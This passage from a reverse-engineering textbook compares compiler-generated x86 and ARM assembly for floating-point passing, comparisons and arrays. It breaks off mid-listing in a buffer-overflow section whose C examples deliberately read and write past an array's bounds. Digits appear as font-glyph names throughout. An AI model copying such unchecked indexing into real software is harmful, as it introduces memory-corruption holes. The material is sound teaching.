uct/six.pnum/six.pnumand sum/six.pnum/seven.pnum, respectively.
The code for thumb-/two.pnum is same.
ARM: Optimizing Keil + thumb mode
f
PUSH {R3-R7,LR}
MOVS R7, R2
MOVS R4, R3
MOVS R5, R0
MOVS R6, R1
LDR R2, =0x66666666
LDR R3, =0x40106666
MOVS R0, R7
MOVS R1, R4
BL __aeabi_dmul
MOVS R7, R0
MOVS R4, R1
LDR R2, =0x51EB851F
LDR R3, =0x40091EB8
MOVS R0, R5
MOVS R1, R6
BL __aeabi_ddiv
MOVS R2, R7
MOVS R3, R4
BL __aeabi_dadd
POP {R3-R7,PC}
dword_364 DCD 0x66666666 ; DATA XREF: f+A
dword_368 DCD 0x40106666 ; DATA XREF: f+C
dword_36C DCD 0x51EB851F ; DATA XREF: f+1A
dword_370 DCD 0x40091EB8 ; DATA XREF: f+1C
Keil generates for processors not supporting FPU or NEON. So, double-precision floating numbers are passed
via usual R-registers, and instead of FPU-instructions, service library functions are called, like __aeabi_dmul ,
__aeabi_ddiv ,__aeabi_dadd , which emulating multiplication, division and addition floating-point numbers. Of
course, that’s slower than FPU-coprocessor, but it’s better than nothing.
By the way, similar FPU-emulating libraries were very popular in x/eight.pnum/six.pnum world when coprocessors were rare and
expensive, and were installed only on expensive computers.
FPU-coprocessor emulating calling so/f_t float orarmel in ARM world, while coprocessor’s FPU-instructions us-
age calling hard float orarmhf .
For example, Linux kernel for Raspberry Pi is compiled in two variants. In so/f_t float case, arguments will be
passed via R-registers, and in hard float case — via D-registers.
And that’s what don’t let you use, for example, armhf-libraries from armel-code or vice versa, so that’s why all
code in Linux distribution should be compiled according to chosen calling convention.
/one.pnum./one.pnum/three.pnum./two.pnum Passing floating point number via arguments
int main ()
{
printf ("32.01 ^ 1.54 = %lf\n", pow (32.01,1.54));
return 0;
}
/six.pnum/six.pnumresult of multiplication
/six.pnum/seven.pnumresult of addition
/six.pnum/zero.pnum
x/eight.pnum/six.pnum
Let’s see what we got in (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./four.pnum/zero.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
CONST SEGMENT
__real@40400147ae147ae1 DQ 040400147ae147ae1r ; 32.01
__real@3ff8a3d70a3d70a4 DQ 03ff8a3d70a3d70a4r ; 1.54
CONST ENDS
_main PROC
push ebp
mov ebp, esp
sub esp, 8 ; allocate place for the first variable
fld QWORD PTR __real@3ff8a3d70a3d70a4
fstp QWORD PTR [esp]
sub esp, 8 ; allocate place for the second variable
fld QWORD PTR __real@40400147ae147ae1
fstp QWORD PTR [esp]
call _pow
add esp, 8 ; "return back" place of one variable.
; in local stack here 8 bytes still reserved for us.
; result now in ST(0)
fstp QWORD PTR [esp] ; move result from ST(0) to local stack for printf()
push OFFSET $SG2651
call _printf
add esp, 12
xor eax, eax
pop ebp
ret 0
_main ENDP
FLDandFSTP are moving variables from/to data segment to FPU stack. pow()/six.pnum/eight.pnumtaking both values from FPU-
stack and returning result in ST(0) .printf() takes /eight.pnum bytes from local stack and interpret them as double type
variable.
ARM + Non-optimizing Xcode (LLVM) + thumb-/two.pnum mode
_main
var_C = -0xC
PUSH {R7,LR}
MOV R7, SP
SUB SP, SP, #4
VLDR D16, =32.01
VMOV R0, R1, D16
VLDR D16, =1.54
VMOV R2, R3, D16
BLX _pow
VMOV D16, R0, R1
MOV R0, 0xFC1 ; "32.01 ^ 1.54 = %lf\n"
ADD R0, PC
VMOV R1, R2, D16
BLX _printf
MOVS R1, 0
STR R0, [SP,#0xC+var_C]
MOV R0, R1
ADD SP, SP, #4
POP {R7,PC}
/six.pnum/eight.pnumstandard C function, raises a number to the given power
/six.pnum/one.pnum
dbl_2F90 DCFD 32.01 ; DATA XREF: _main+6
dbl_2F98 DCFD 1.54 ; DATA XREF: _main+E
As I wrote before, /six.pnum/four.pnum-bit floating pointer numbers passing in R-registers pairs. This is code is redundant for a
little (certainty because optimization is turned off), because, it’s actually possible to load values into R-registers
straightforwardly without touching D-registers.
So, as we see, _pow function receiving first argument in R0andR1, and the second one in R2andR3. Function
leave result in R0andR1. Result of _pow is moved into D16, then inR1andR2pair, from where printf() will take
this number.
ARM + Non-optimizing Keil + ARM mode
_main
STMFD SP!, {R4-R6,LR}
LDR R2, =0xA3D70A4 ; y
LDR R3, =0x3FF8A3D7
LDR R0, =0xAE147AE1 ; x
LDR R1, =0x40400147
BL pow
MOV R4, R0
MOV R2, R4
MOV R3, R1
ADR R0, a32_011_54Lf ; "32.01 ^ 1.54 = %lf\n"
BL __2printf
MOV R0, #0
LDMFD SP!, {R4-R6,PC}
y DCD 0xA3D70A4 ; DATA XREF: _main+4
dword_520 DCD 0x3FF8A3D7 ; DATA XREF: _main+8
; double x
x DCD 0xAE147AE1 ; DATA XREF: _main+C
dword_528 DCD 0x40400147 ; DATA XREF: _main+10
a32_011_54Lf DCB "32.01 ^ 1.54 = %lf",0xA,0
; DATA XREF: _main+24
D-registers are not used here, only R-register pairs are used.
/one.pnum./one.pnum/three.pnum./three.pnum Comparison example
Let’s try this:
double d_max (double a, double b)
{
if (a>b)
return a;
return b;
};
x/eight.pnum/six.pnum
Despite simplicity of that function, it will be harder to understand how it works.
MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum generated:
Listing /one.pnum./four.pnum/one.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
PUBLIC _d_max
_TEXT SEGMENT
_a$ = 8 ; size = 8
_b$ = 16 ; size = 8
_d_max PROC
/six.pnum/two.pnum
push ebp
mov ebp, esp
fld QWORD PTR _b$[ebp]
; current stack state: ST(0) = _b
; compare _b (ST(0)) and _a, and pop register
fcomp QWORD PTR _a$[ebp]
; stack is empty here
fnstsw ax
test ah, 5
jp SHORT $LN1@d_max
; we are here only if a>b
fld QWORD PTR _a$[ebp]
jmp SHORT $LN2@d_max
$LN1@d_max:
fld QWORD PTR _b$[ebp]
$LN2@d_max:
pop ebp
ret 0
_d_max ENDP
So,FLDloading_bintoST(0) register.
FCOMP compares ST(0) register state with what is in _avalue and set C3/C2/C0bits in FPU status word register.
This is /one.pnum/six.pnum-bit register reflecting current state of FPU.
For nowC3/C2/C0bits are set, but unfortunately, CPU before Intel P/six.pnum/six.pnum/nine.pnumhasn’t any conditional jumps instruc-
tions which are checking these bits. Probably, it is a matter of history (remember: FPU was separate chip in past).
Modern CPU starting at Intel P/six.pnum has FCOMI /FCOMIP /FUCOMI /FUCOMIP instructions — which does that same, but
modifies CPU flags ZF/PF/CF.
A/f_ter bits are set, the FCOMP instruction popping one variable from stack. This is what distinguish it from FCOM ,
which is just comparing values, leaving the stack at the same state.
FNSTSW copies FPU status word register to AX. BitsC3/C2/C0are placed at positions /one.pnum/four.pnum//one.pnum/zero.pnum//eight.pnum, they will be at the
same positions in AXregisters and all them are placed in high part of AX—AH.
∙If b>a in our example, then C3/C2/C0bits will be set as following: /zero.pnum, /zero.pnum, /zero.pnum.
∙If a>b, then bits will be set: /zero.pnum, /zero.pnum, /one.pnum.
∙If a=b, then bits will be set: /one.pnum, /zero.pnum, /zero.pnum.
A/f_tertest ah, 5 execution, bits C3andC1will be set to /zero.pnum, but at positions /zero.pnum and /two.pnum (in AHregisters) C0andC2
bits will be leaved.
Now let’s talk about parity flag. Another notable epoch rudiment:
One common reason to test the parity flag actually has nothing to do with parity. The FPU
has four condition flags (C/zero.pnum to C/three.pnum), but they can not be tested directly, and must instead be first
copied to the flags register. When this happens, C/zero.pnum is placed in the carry flag, C/two.pnum in the parity flag
and C/three.pnum in the zero flag. The C/two.pnum flag is set when e.g. incomparable floating point values (NaN or
unsupported format) are compared with the FUCOM instructions./seven.pnum/zero.pnum
This flag is to be set to /one.pnum if ones number is even. And to zero if odd.
/six.pnum/nine.pnumIntel P/six.pnum is Pentium Pro, Pentium II, etc
/six.pnum/three.pnum
Thus,PFflag will be set to /one.pnum if both C0andC2are set to zero or both are ones. And then following JP(jump
if PF==/one.pnum ) will be triggered. If we recall values of C3/C2/C0for different cases, we will see that conditional jump JP
will be triggered in two cases: if b>a or a==b ( C3bit is already not considering here, because it was cleared while
execution of test ah, 5 instruction).
It is all simple therea/f_ter. If conditional jump was triggered, FLDwill load _bvalue toST(0) , and if it’s not
triggered, _awill be loaded.
But it is not over yet!
Now let’s compile it with MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with optimization option /Ox
Listing /one.pnum./four.pnum/two.pnum: Optimizing MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_a$ = 8 ; size = 8
_b$ = 16 ; size = 8
_d_max PROC
fld QWORD PTR _b$[esp-4]
fld QWORD PTR _a$[esp-4]
; current stack state: ST(0) = _a, ST(1) = _b
fcom ST(1) ; compare _a and ST(1) = (_b)
fnstsw ax
test ah, 65 ; 00000041H
jne SHORT $LN5@d_max
fstp ST(1) ; copy ST(0) to ST(1) and pop register, leave (_a) on top
; current stack state: ST(0) = _a
ret 0
$LN5@d_max:
fstp ST(0) ; copy ST(0) to ST(0) and pop register, leave (_b) on top
; current stack state: ST(0) = _b
ret 0
_d_max ENDP
FCOM is distinguished from FCOMP is that sense that it just comparing values and leave FPU stack in the same
state. Unlike previous example, operands here in reversed order. And that is why result of comparision in C3/C2/C0
will be different:
∙If a>b in our example, then C3/C2/C0bits will be set as: /zero.pnum, /zero.pnum, /zero.pnum.
∙If b>a, then bits will be set as: /zero.pnum, /zero.pnum, /one.pnum.
∙If a=b, then bits will be set as: /one.pnum, /zero.pnum, /zero.pnum.
It can be said, test ah, 65 instruction just leave two bits — C3andC0. Both will be zeroes if a>b: in that case
JNEjump will not be triggered. Then FSTP ST(1) is following — this instruction copies ST(0) value into operand
and popping one value from FPU stack. In other words, that instruction copies ST(0) (where_avalue now) into
ST(1) . A/f_ter that, two values of _a are at the top of stack now. A/f_ter that, one value is popping. A/f_ter that, ST(0)
will contain _a and function is finished.
Conditional jump JNEis triggered in two cases: of b>a or a==b. ST(0) intoST(0) will be copied, it is just like
idle (NOP) operation, then one value is popping from stack and top of stack ( ST(0) ) will contain what was in ST(1)
before (that is _b). Then function finishes. That instruction used here probably because FPU has no instruction to
pop value from stack and not to store it anywhere.
Well, but it is still not over.
/six.pnum/four.pnum
GCC /four.pnum./four.pnum./one.pnum
Listing /one.pnum./four.pnum/three.pnum: GCC /four.pnum./four.pnum./one.pnum
d_max proc near
b = qword ptr -10h
a = qword ptr -8
a_first_half = dword ptr 8
a_second_half = dword ptr 0Ch
b_first_half = dword ptr 10h
b_second_half = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
; put a and b to local stack:
mov eax, [ebp+a_first_half]
mov dword ptr [ebp+a], eax
mov eax, [ebp+a_second_half]
mov dword ptr [ebp+a+4], eax
mov eax, [ebp+b_first_half]
mov dword ptr [ebp+b], eax
mov eax, [ebp+b_second_half]
mov dword ptr [ebp+b+4], eax
; load a and b to FPU stack:
fld [ebp+a]
fld [ebp+b]
; current stack state: ST(0) - b; ST(1) - a
fxch st(1) ; this instruction swapping ST(1) and ST(0)
; current stack state: ST(0) - a; ST(1) - b
fucompp ; compare a and b and pop two values from stack, i.e., a and b
fnstsw ax ; store FPU status to AX
sahf ; load SF, ZF, AF, PF, and CF flags state from AH
setnbe al ; store 1 to AL if CF=0 and ZF=0
test al, al ; AL==0 ?
jz short loc_8048453 ; yes
fld [ebp+a]
jmp short locret_8048456
loc_8048453:
fld [ebp+b]
locret_8048456:
leave
retn
d_max endp
FUCOMPP — is almost like FCOM , but popping both values from stack and handling “not-a-numbers” differently.
More about not-a-numbers :
FPU is able to work with special values which are not-a-numbers or NaNs/seven.pnum/one.pnum. These are infinity, result of dividing
by zero, etc. Not-a-numbers can be “quiet” and “signalling” . It is possible to continue to work with “quiet” NaNs,
but if one try to do some operation with “signalling” NaNs — an exception will be raised.
FCOM will raise exception if any operand — NaN. FUCOM will raise exception only if any operand — signalling
NaN (SNaN).
/seven.pnum/one.pnumhttp://en.wikipedia.org/wiki/NaN
/six.pnum/five.pnum
The following instruction is SAHF — this is rare instruction in the code which is not use FPU. /eight.pnum bits from AH is
movinto into lower /eight.pnum bits of CPU flags in the following order: SF:ZF:-:AF:-:PF:-:CF <- AH .
Let’s remember that FNSTSW is moving interesting for us bits C3/C2/C0intoAHand they will be in positions /six.pnum,
/two.pnum, /zero.pnum inAHregister.
In other words, fnstsw ax / sahf instruction pair is moving C3/C2/C0intoZF,PF,CFCPU flags.
Now let’s also recall, what values of C3/C2/C0bits will be set:
∙If a is greater than b in our example, then C3/C2/C0bits will be set as: /zero.pnum, /zero.pnum, /zero.pnum.
∙if a is less than b, then bits will be set as: /zero.pnum, /zero.pnum, /one.pnum.
∙If a=b, then bits will be set: /one.pnum, /zero.pnum, /zero.pnum.
In other words, a/f_ter FUCOMPP /FNSTSW /SAHF instructions, we will have these CPU flags states:
∙If a>b, CPU flags will be set as: ZF=0, PF=0, CF=0 .
∙If a<b, then CPU flags will be set as: ZF=0, PF=0, CF=1 .
∙If a=b, then CPU flags will be set as: ZF=1, PF=0, CF=0 .
HowSETNBE instruction will store /one.pnum or /zero.pnum to AL: it is depends of CPU flags. It is almost JNBE instruction counter-
part, with exception that SETcc/seven.pnum/two.pnumis storing /one.pnum or /zero.pnum to AL, butJccdo actual jump or not. SETNBE store /one.pnum only if CF=0
andZF=0 . If it is not true, zero will be stored into AL.
BothCFis /zero.pnum andZFis /zero.pnum simultaneously only in one case: if a>b.
Then one will be stored to ALand the following JZwill not be triggered and function will return _a. On all other
cases, _b will be returned.
But it is still not over.
GCC /four.pnum./four.pnum./one.pnum with -O3optimization turned on
Listing /one.pnum./four.pnum/four.pnum: Optimizing GCC /four.pnum./four.pnum./one.pnum
public d_max
d_max proc near
arg_0 = qword ptr 8
arg_8 = qword ptr 10h
push ebp
mov ebp, esp
fld [ebp+arg_0] ; _a
fld [ebp+arg_8] ; _b
; stack state now: ST(0) = _b, ST(1) = _a
fxch st(1)
; stack state now: ST(0) = _a, ST(1) = _b
fucom st(1) ; compare _a and _b
fnstsw ax
sahf
ja short loc_8048448
; store ST(0) to ST(0) (idle operation), pop value at top of stack, leave _b at top
fstp st
jmp short loc_804844A
loc_8048448:
; store _a to ST(0), pop value at top of stack, leave _a at top
fstp st(1)
/seven.pnum/two.pnumcciscondition code
/six.pnum/six.pnum
loc_804844A:
pop ebp
retn
d_max endp
It is almost the same except one: JAusage instead of SAHF . Actually, conditional jump instructions checking
“larger” , “lesser” or “equal” for unsigned number comparison ( JA,JAE,JBE,JBE,JE/JZ,JNA,JNAE ,JNB,JNBE ,
JNE/JNZ) are checking only CFandZFflags. And C3/C2/C0bits a/f_ter comparison are moving into these flags exactly
in the same fashion so conditional jumps will work here. JAwill work if both CFareZFzero.
Thereby, conditional jumps instructions listed here can be used a/f_ter FNSTSW /SAHF instructions pair.
It seems, FPU C3/C2/C0status bits was placed there deliberately so to map them to base CPU flags without
additional permutations.
ARM + Optimizing Xcode (LLVM) + ARM mode
Listing /one.pnum./four.pnum/five.pnum: Optimizing Xcode (LLVM) + ARM mode
VMOV D16, R2, R3 ; b
VMOV D17, R0, R1 ; a
VCMPE.F64 D17, D16
VMRS APSR_nzcv, FPSCR
VMOVGT.F64 D16, D17 ; copy b to D16
VMOV R0, R1, D16
BX LR
A very simple case. Input values are placed into D17andD16and then compared with the help of VCMPE in-
struction. Just like in x/eight.pnum/six.pnum coprocessor, ARM coprocessor has its own status and flags register, ( FPSCR ), because
there is a need to store coprocessor-specific flags.
And just like in x/eight.pnum/six.pnum, there are no conditional jump instruction in ARM, checking bits in coprocessor status reg-
ister, so there is VMRS instruction, copying /four.pnum bits (N, Z, C, V) from the coprocessor status word into bits of general
status (APSR register).
VMOVGT is analogue of MOVGT , instruction, to be executed if one operand is greater than other while comparing
(GT — Greater Than ).
If it will be executed, bvalue will be written into D16, stored at that moment in D17.
And if it will not be triggered, then avalue will stay in D16.
Penultimate instruction VMOV will prepare value in D16for returning via R0andR1registers pair.
ARM + Optimizing Xcode (LLVM) + thumb-/two.pnum mode
Listing /one.pnum./four.pnum/six.pnum: Optimizing Xcode (LLVM) + thumb-/two.pnum mode
VMOV D16, R2, R3 ; b
VMOV D17, R0, R1 ; a
VCMPE.F64 D17, D16
VMRS APSR_nzcv, FPSCR
IT GT
VMOVGT.F64 D16, D17
VMOV R0, R1, D16
BX LR
Almost the same as in previous example, howeverm slightly different. As a matter of fact, many instructions
in ARM mode can be supplied by condition predicate, and the instruction is to be executed if condition is true.
But there are no such thing in thumb mode. There are no place in /one.pnum/six.pnum-bit instructions for spare /four.pnum bits where
condition can be encoded.
However, thumb-/two.pnum was extended to make possible to specify predicates to old thumb instructions.
Here, is the IDA /five.pnum-generated listing, we see VMOVGT instruction, the same as in previous example.
But in fact, usual VMOV is encoded there, but IDA /five.pnum added -GTsuffix to it, because there are “IT GT” instruction
placed right before.
/six.pnum/seven.pnum
ITinstruction defines so-called if-then block . A/f_ter that instruction, it’s possible to place up to /four.pnum instructions,
to which predicate suffix will be added. In our example, “IT GT” meaning, the next instruction will be executed,
ifGT(Greater Than ) condition is true.
Now more complex code fragment, by the way, from “Angry Birds” (for iOS):
Listing /one.pnum./four.pnum/seven.pnum: Angry Birds Classic
ITE NE
VMOVNE R2, R3, D16
VMOVEQ R2, R3, D17
ITEmeaning if-then-else and it encode suffixes for two next instructions. First instruction will execute if con-
dition encoded in ITE(NE, not equal ) will be true at that moment, and the second — if that condition will not be
true. (Inverse condition of NEisEQ(equal )).
Slightly harder, and this fragment from “Angry Birds” as well:
Listing /one.pnum./four.pnum/eight.pnum: Angry Birds Classic
ITTTT EQ
MOVEQ R0, R4
ADDEQ SP, SP, #0x20
POPEQ.W {R8,R10}
POPEQ {R4-R7,PC}
/four.pnum “T” symbols in instruction mnemonic mean that /four.pnum next instructions will be executed if condition is true.
That’s why IDA /five.pnum added -EQsuffix to each /four.pnum instructions.
And if there will be, for example, ITEEE EQ (if-then-else-else-else ), then suffixes will be set as follows:
-EQ
-NE
-NE
-NE
Another fragment from “Angry Birds”:
Listing /one.pnum./four.pnum/nine.pnum: Angry Birds Classic
CMP.W R0, #0xFFFFFFFF
ITTE LE
SUBLE.W R10, R0, #1
NEGLE R0, R0
MOVGT R10, R0
ITTE (if-then-then-else ) mean that /one.pnumst and /two.pnumnd instructions will be executed, if LE(Less or Equal ) condition is
true, and /three.pnumrd — if inverse condition ( GT—Greater Than ) is true.
Compilers usually are not generating all possible combinations. For example, it mentioned “Angry Birds” game
(classic version for iOS) only these cases of ITinstruction are used: IT,ITE,ITT,ITTE ,ITTT ,ITTTT . How I learnt
this? In IDA /five.pnum it’s possible to produce listing files, so I did it, but I also set in options to show /four.pnum bytes of each opcodes
. Then, knowing that high part of /one.pnum/six.pnum-bit opcode ITis0xBF , I did this with grep :
cat AngryBirdsClassic.lst | grep " BF" | grep "IT" > results.lst
By the way, if to program in ARM assembly language manually for thumb-/two.pnum mode, with adding conditional
suffixes, assembler will add ITinstructions automatically, with respectable flags, where it’s need.
ARM + Non-optimizing Xcode (LLVM) + ARM mode
Listing /one.pnum./five.pnum/zero.pnum: Non-optimizing Xcode (LLVM) + ARM mode
b = -0x20
a = -0x18
val_to_return = -0x10
saved_R7 = -4
/six.pnum/eight.pnum
STR R7, [SP,#saved_R7]!
MOV R7, SP
SUB SP, SP, #0x1C
BIC SP, SP, #7
VMOV D16, R2, R3
VMOV D17, R0, R1
VSTR D17, [SP,#0x20+a]
VSTR D16, [SP,#0x20+b]
VLDR D16, [SP,#0x20+a]
VLDR D17, [SP,#0x20+b]
VCMPE.F64 D16, D17
VMRS APSR_nzcv, FPSCR
BLE loc_2E08
VLDR D16, [SP,#0x20+a]
VSTR D16, [SP,#0x20+val_to_return]
B loc_2E10
loc_2E08
VLDR D16, [SP,#0x20+b]
VSTR D16, [SP,#0x20+val_to_return]
loc_2E10
VLDR D16, [SP,#0x20+val_to_return]
VMOV R0, R1, D16
MOV SP, R7
LDR R7, [SP+0x20+b],#4
BX LR
Almost the same we already saw, but too much redundant code because of aandbvariables storage in local
stack, as well as returning value.
ARM + Optimizing Keil + thumb mode
Listing /one.pnum./five.pnum/one.pnum: Optimizing Keil + thumb mode
PUSH {R3-R7,LR}
MOVS R4, R2
MOVS R5, R3
MOVS R6, R0
MOVS R7, R1
BL __aeabi_cdrcmple
BCS loc_1C0
MOVS R0, R6
MOVS R1, R7
POP {R3-R7,PC}
loc_1C0
MOVS R0, R4
MOVS R1, R5
POP {R3-R7,PC}
Keil not generate special instruction for float numbers comparing, because, it cannot rely it will be supported
on the target CPU, and it cannot be done by simple bitwise comparing. So there is called external library function
for comparing: __aeabi_cdrcmple . Please note, comparision result is to be leaved in flags, so the following BCS
(Carry set - Greater than or equal ) instruction may work without any additional code.
/six.pnum/nine.pnum
/one.pnum./one.pnum/four.pnum Arrays
Array is just a set of variables in memory, always lying next to each other, always has same type.
/one.pnum./one.pnum/four.pnum./one.pnum Simple example
#include <stdio.h>
int main()
{
int a[20];
int i;
for (i=0; i<20; i++)
a[i]=i*2;
for (i=0; i<20; i++)
printf ("a[%d]=%d\n", i, a[i]);
return 0;
};
x/eight.pnum/six.pnum
Let’s compile:
Listing /one.pnum./five.pnum/two.pnum: MSVC
_TEXT SEGMENT
_i$ = -84 ; size = 4
_a$ = -80 ; size = 80
_main PROC
push ebp
mov ebp, esp
sub esp, 84 ; 00000054H
mov DWORD PTR _i$[ebp], 0
jmp SHORT $LN6@main
$LN5@main:
mov eax, DWORD PTR _i$[ebp]
add eax, 1
mov DWORD PTR _i$[ebp], eax
$LN6@main:
cmp DWORD PTR _i$[ebp], 20 ; 00000014H
jge SHORT $LN4@main
mov ecx, DWORD PTR _i$[ebp]
shl ecx, 1
mov edx, DWORD PTR _i$[ebp]
mov DWORD PTR _a$[ebp+edx*4], ecx
jmp SHORT $LN5@main
$LN4@main:
mov DWORD PTR _i$[ebp], 0
jmp SHORT $LN3@main
$LN2@main:
mov eax, DWORD PTR _i$[ebp]
add eax, 1
mov DWORD PTR _i$[ebp], eax
$LN3@main:
cmp DWORD PTR _i$[ebp], 20 ; 00000014H
jge SHORT $LN1@main
mov ecx, DWORD PTR _i$[ebp]
mov edx, DWORD PTR _a$[ebp+ecx*4]
push edx
mov eax, DWORD PTR _i$[ebp]
push eax
/seven.pnum/zero.pnum
push OFFSET $SG2463
call _printf
add esp, 12 ; 0000000cH
jmp SHORT $LN2@main
$LN1@main:
xor eax, eax
mov esp, ebp
pop ebp
ret 0
_main ENDP
Nothing very special, just two loops: first is filling loop and second is printing loop. shl ecx, 1 instruction is
used forECXvalue multiplication by /two.pnum, more about below /one.pnum./one.pnum/five.pnum./three.pnum.
/eight.pnum/zero.pnum bytes are allocated in stack for array, that’s /two.pnum/zero.pnum elements of /four.pnum bytes.
Here is what GCC /four.pnum./four.pnum./one.pnum does:
Listing /one.pnum./five.pnum/three.pnum: GCC /four.pnum./four.pnum./one.pnum
public main
main proc near ; DATA XREF: _start+17
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
i_2 = dword ptr -54h
i = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 70h
mov [esp+70h+i], 0 ; i=0
jmp short loc_804840A
loc_80483F7:
mov eax, [esp+70h+i]
mov edx, [esp+70h+i]
add edx, edx ; edx=i*2
mov [esp+eax*4+70h+i_2], edx
add [esp+70h+i], 1 ; i++
loc_804840A:
cmp [esp+70h+i], 13h
jle short loc_80483F7
mov [esp+70h+i], 0
jmp short loc_8048441
loc_804841B:
mov eax, [esp+70h+i]
mov edx, [esp+eax*4+70h+i_2]
mov eax, offset aADD ; "a[%d]=%d\n"
mov [esp+70h+var_68], edx
mov edx, [esp+70h+i]
mov [esp+70h+var_6C], edx
mov [esp+70h+var_70], eax
call _printf
add [esp+70h+i], 1
loc_8048441:
cmp [esp+70h+i], 13h
jle short loc_804841B
mov eax, 0
leave
retn
main endp
/seven.pnum/one.pnum
By the way, avariable has int*type (that is pointer to int) — you can try to pass a pointer to array to another
function, but it much correctly to say that pointer to the first array elemnt is passed (addresses of another ele-
ment’s places are calculated in obvious way). If to index this pointer as a[idx] ,idxjust to be added to the pointer
and the element placed there (to which calculated pointer is pointing) returned.
An interesting example: string of characters like “string” is array of characters and it has const char* type.Index
can be applied to this pointer. And that’s why it’s possible to write like “string”[i] — this is correct C/C++ ex-
pression!
ARM + Non-optimizing Keil + ARM mode
EXPORT _main
_main
STMFD SP!, {R4,LR}
SUB SP, SP, #0x50 ; allocate place for 20 int variables
; first loop
MOV R4, #0 ; i
B loc_4A0
loc_494
MOV R0, R4,LSL#1 ; R0=R4*2
STR R0, [SP,R4,LSL#2] ; store R0 to SP+R4<<2 (same as SP+R4*4)
ADD R4, R4, #1 ; i=i+1
loc_4A0
CMP R4, #20 ; i<20?
BLT loc_494 ; yes, run loop body again
; second loop
MOV R4, #0 ; i
B loc_4C4
loc_4B0
LDR R2, [SP,R4,LSL#2] ; (second printf argument) R2=*(SP+R4<<4) (same as *(SP+R4*4))
MOV R1, R4 ; (first printf argument) R1=i
ADR R0, aADD ; "a[%d]=%d\n"
BL __2printf
ADD R4, R4, #1 ; i=i+1
loc_4C4
CMP R4, #20 ; i<20?
BLT loc_4B0 ; yes, run loop body again
MOV R0, #0 ; value to return
ADD SP, SP, #0x50 ; deallocate place for 20 int variables
LDMFD SP!, {R4,PC}
inttype require /three.pnum/two.pnum bits for storage, or /four.pnum bytes, so for storage of /two.pnum/zero.pnum intvariables, 80(0x50) bytes are needed,
so that’s why “SUB SP, SP, #0x50” instruction in function epilogue allocates exactly this ammount of space in
local stack.
In both first and second loops, iloop iterator will be placed in R4register.
A number to be written into array, is calculating as i*2which is equivalent to shi/f_ting le/f_t by one bit, so “MOV
R0, R4,LSL#1” instruction do this.
“STR R0, [SP,R4,LSL#2]” writesR0contents into array. Here is how a pointer to array element is to be
calculated: SPpointing to array begin, R4isi. So shi/f_t ile/f_t by /two.pnum bits, that’s equivalent to multiplication by 4
(because each array element has size of /four.pnum bytes) and add it to address of array begin.
The second loop has inverse “LDR R2, [SP,R4,LSL#2]” , instruction, it loads from array value we need, and
the pointer to it is calculated in exactly the same way.
ARM + Optimizing Keil + thumb mode
/seven.pnum/two.pnum
_main
PUSH {R4,R5,LR}
SUB SP, SP, #0x54 ; allocate place for 20 int variables + one more variable
; first loop
MOVS R0, #0 ; i
MOV R5, SP ; pointer to first array element
loc_1CE
LSLS R1, R0, #1 ; R1=i<<1 (same as i*2)
LSLS R2, R0, #2 ; R2=i<<2 (same as i*4)
ADDS R0, R0, #1 ; i=i+1
CMP R0, #20 ; i<20?
STR R1, [R5,R2] ; store R1 to *(R5+R2) (same R5+i*4)
BLT loc_1CE ; yes, i<20, run loop body again
; second loop
MOVS R4, #0 ; i=0
loc_1DC
LSLS R0, R4, #2 ; R0=i<<2 (same as i*4)
LDR R2, [R5,R0] ; load from *(R5+R0) (same as R5+i*4)
MOVS R1, R4
ADR R0, aADD ; "a[%d]=%d\n"
BL __2printf
ADDS R4, R4, #1 ; i=i+1
CMP R4, #20 ; i<20?
BLT loc_1DC ; yes, i<20, run loop body again
MOVS R0, #0 ; value to return
ADD SP, SP, #0x54 ; deallocate place for 20 int variables + one more variable
POP {R4,R5,PC}
Thumb code is very similar. Thumb mode has special instructions for bit shi/f_ting (like LSLS ), calculating value
to be written into array and address of each element in array as well.
Compiler allocates slightly more space in local stack, however, last /four.pnum bytes are not used.
/one.pnum./one.pnum/four.pnum./two.pnum Buffer overflow
So, array indexing is just array[index] . If you study generated code closely, you’ll probably note missing index
bounds checking, which could check index, if it is less than /two.pnum/zero.pnum . What if index will be greater than /two.pnum/zero.pnum? That’s the one
C/C++ feature it’s o/f_ten blamed for.
Here is a code successfully compiling and working:
#include <stdio.h>
int main()
{
int a[20];
int i;
for (i=0; i<20; i++)
a[i]=i*2;
printf ("a[100]=%d\n", a[100]);
return 0;
};
Compilation results (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
_TEXT SEGMENT
_i$ = -84 ; size = 4
_a$ = -80 ; size = 80
/seven.pnum/three.pnum
_main PROC
push ebp
mov ebp, esp
sub esp, 84 ; 00000054H
mov DWORD PTR _i$[ebp], 0
jmp SHORT $LN3@main
$LN2@main:
mov eax, DWORD PTR _i$[ebp]
add eax, 1
mov DWORD PTR _i$[ebp], eax
$LN3@main:
cmp DWORD PTR _i$[ebp], 20 ; 00000014H
jge SHORT $LN1@main
mov ecx, DWORD PTR _i$[ebp]
shl ecx, 1
mov edx, DWORD PTR _i$[ebp]
mov DWORD PTR _a$[ebp+edx*4], ecx
jmp SHORT $LN2@main
$LN1@main:
mov eax, DWORD PTR _a$[ebp+400]
push eax
push OFFSET $SG2460
call _printf
add esp, 8
xor eax, eax
mov esp, ebp
pop ebp
ret 0
_main ENDP
I’m running it, and I got:
a[100]=760826203
It is just something , occasionally lying in the stack near to array, /four.pnum/zero.pnum/zero.pnum bytes from its first element.
Indeed, how it could be done differently? Compiler may incorporate some code, checking index value to be
always in array’s bound, like in higher-level programming languages/seven.pnum/three.pnum, but this makes running code slower.
OK, we read some values in stack illegally , but what if we could write something to it?
Here is what we will write:
#include <stdio.h>
int main()
{
int a[20];
int i;
for (i=0; i<30; i++)
a[i]=i;
return 0;
};
And what we’ve got:
_TEXT SEGMENT
_i$ = -84 ; size = 4
_a$ = -80 ; size = 80
_main PROC
push ebp
mov ebp, esp
sub esp, 84 ; 00000054H
mov DWORD PTR _i$[ebp], 0
jmp SHORT $LN3@main
/seven.pnum/three.pnumJava, Python, etc
/seven.pnum/four.pnum
$LN2@main:
mov eax, DWORD PTR _i$[ebp]
add eax, 1
